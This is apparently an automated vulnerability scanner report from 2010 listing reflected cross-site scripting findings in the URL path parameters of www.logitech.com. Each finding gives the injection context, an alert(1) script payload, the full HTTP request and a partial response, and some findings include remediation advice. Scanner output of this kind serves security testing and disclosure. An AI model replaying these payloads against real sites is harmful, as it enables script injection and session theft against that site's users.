The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7a45</script><script>alert(1)</script>48983b2217d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f7a45</script><script>alert(1)</script>48983b2217d/439/4098 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c948"><script>alert(1)</script>4b45c30b940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us5c948"><script>alert(1)</script>4b45c30b940/439/4098 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7aed"%3ba248533bd5d was submitted in the REST URL parameter 1. This input was echoed as e7aed";a248533bd5d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-use7aed"%3ba248533bd5d/439/4098 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8746"><script>alert(1)</script>c3d4a83f3b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/439f8746"><script>alert(1)</script>c3d4a83f3b3/4098 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da9dc</script><script>alert(1)</script>434142660f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/439da9dc</script><script>alert(1)</script>434142660f7/4098 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24679</script><script>alert(1)</script>77bbe212c41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/439/409824679</script><script>alert(1)</script>77bbe212c41 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ecf"><script>alert(1)</script>fca15020eeb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/439/4098c1ecf"><script>alert(1)</script>fca15020eeb HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f13d8"%3b04cc335b265 was submitted in the REST URL parameter 1. This input was echoed as f13d8";04cc335b265 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usf13d8"%3b04cc335b265/439/6782 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9af"><script>alert(1)</script>3f5ee0c1efd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us2b9af"><script>alert(1)</script>3f5ee0c1efd/439/6782 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a867e</script><script>alert(1)</script>422124dc22f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a867e</script><script>alert(1)</script>422124dc22f/439/6782 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 387ac</script><script>alert(1)</script>fa2c6ce6b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/439387ac</script><script>alert(1)</script>fa2c6ce6b3e/6782 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655f8"><script>alert(1)</script>357587858a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/439655f8"><script>alert(1)</script>357587858a4/6782 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfc27</script><script>alert(1)</script>51592453a43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/439/6782dfc27</script><script>alert(1)</script>51592453a43 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde52"><script>alert(1)</script>13c00f97f4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/439/6782cde52"><script>alert(1)</script>13c00f97f4e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2525</script><script>alert(1)</script>3d6d55d47e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e2525</script><script>alert(1)</script>3d6d55d47e2/440/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33b4"><script>alert(1)</script>b9c86656f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd33b4"><script>alert(1)</script>b9c86656f2f/440/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c55dd"%3bd7ff9698ede was submitted in the REST URL parameter 1. This input was echoed as c55dd";d7ff9698ede in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usc55dd"%3bd7ff9698ede/440/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d262</script><script>alert(1)</script>edd086d7708 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4407d262</script><script>alert(1)</script>edd086d7708/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae633"><script>alert(1)</script>e0f10e027d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/440ae633"><script>alert(1)</script>e0f10e027d4/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81efb"><script>alert(1)</script>0eac73de657 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/440/644181efb"><script>alert(1)</script>0eac73de657 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80ed</script><script>alert(1)</script>2fbd33cbb15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/440/6441d80ed</script><script>alert(1)</script>2fbd33cbb15 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2c6"%3b294277ab9cd was submitted in the REST URL parameter 1. This input was echoed as cb2c6";294277ab9cd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-uscb2c6"%3b294277ab9cd/441/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16b38"><script>alert(1)</script>137963cf9c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us16b38"><script>alert(1)</script>137963cf9c6/441/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c31f5</script><script>alert(1)</script>464dfd89d69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c31f5</script><script>alert(1)</script>464dfd89d69/441/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a80"><script>alert(1)</script>a73ddde9e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/441f7a80"><script>alert(1)</script>a73ddde9e9e/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48689</script><script>alert(1)</script>d0ba80f6fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/44148689</script><script>alert(1)</script>d0ba80f6fb/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f922b"><script>alert(1)</script>a8fee35837e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf922b"><script>alert(1)</script>a8fee35837e/441/301 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a7ea</script><script>alert(1)</script>2fe629c08ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1a7ea</script><script>alert(1)</script>2fe629c08ea/441/301 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
